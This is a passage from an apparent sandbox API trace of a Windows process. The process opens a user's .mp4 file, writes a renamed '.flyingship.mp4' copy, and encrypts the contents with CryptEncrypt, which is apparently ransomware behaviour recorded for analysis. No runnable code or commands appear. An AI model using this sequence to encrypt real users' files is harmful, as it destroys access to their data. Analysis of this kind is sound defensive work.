(HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0075.356] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\i_yvzxv2vbg06xdhag1z.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0075.356] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.356] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61e9f8 | out: lpNewFilePointer=0x0) returned 1 [0075.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0075.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.357] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0075.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a10b0 [0075.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.357] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.357] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0075.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0075.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0075.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.358] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.flyingship.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\i_yvzxv2vbg06xdhag1z.flyingship.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0075.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0075.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0075.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.359] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0075.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a10b0 [0075.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0075.359] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.359] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0075.359] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0075.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0075.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0075.359] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.359] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61ea48 | out: lpNewFilePointer=0x0) returned 1 [0075.359] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x1040, lpOverlapped=0x0) returned 1 [0075.360] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x0, lpOverlapped=0x0) returned 1 [0075.361] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0075.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0075.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0075.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1040) returned 0x6a10b0 [0075.361] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0075.361] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0075.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.361] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0075.361] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0075.361] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dae0 [0075.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0075.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0075.361] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0075.361] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0075.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0075.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0075.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.362] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f100 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb608 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0075.362] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da40 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96c8 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0075.362] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da40 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0075.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.362] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.363] PeekMessageW (in: lpMsg=0x61dd8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61dd8c) returned 0 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.363] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0075.363] CryptGetKeyParam (in: hKey=0x6b8af8, dwParam=0x7, pbData=0x6bb608, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb608*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0075.363] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a4188 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.363] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9748 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0075.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0075.363] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0075.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a4188 [0075.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0075.364] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0075.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb568 [0075.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0075.364] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.364] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.364] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df90 [0075.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0075.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0075.364] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0075.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0075.364] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.364] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0075.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.364] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.364] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0075.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb428 [0075.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0075.364] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.364] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0075.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.364] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.364] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.364] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.365] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.365] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bf8 [0075.365] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb428 [0075.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0075.365] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.365] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0075.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0075.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb428 [0075.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0075.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.365] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.365] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0075.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0075.365] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0075.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0075.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0075.365] CryptEncrypt (in: hKey=0x6b8af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x1040, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x1050) returned 1 [0075.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5a8 [0075.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0075.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0075.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5c8 [0075.366] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a4188 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0075.366] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.366] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb428 [0075.366] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb428 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.366] CharLowerBuffW (in: lpsz="byte[4177]", cchLength=0xa | out: lpsz="byte[4177]") returned 0xa [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b450 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0075.366] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0075.366] RtlAllocateHeap 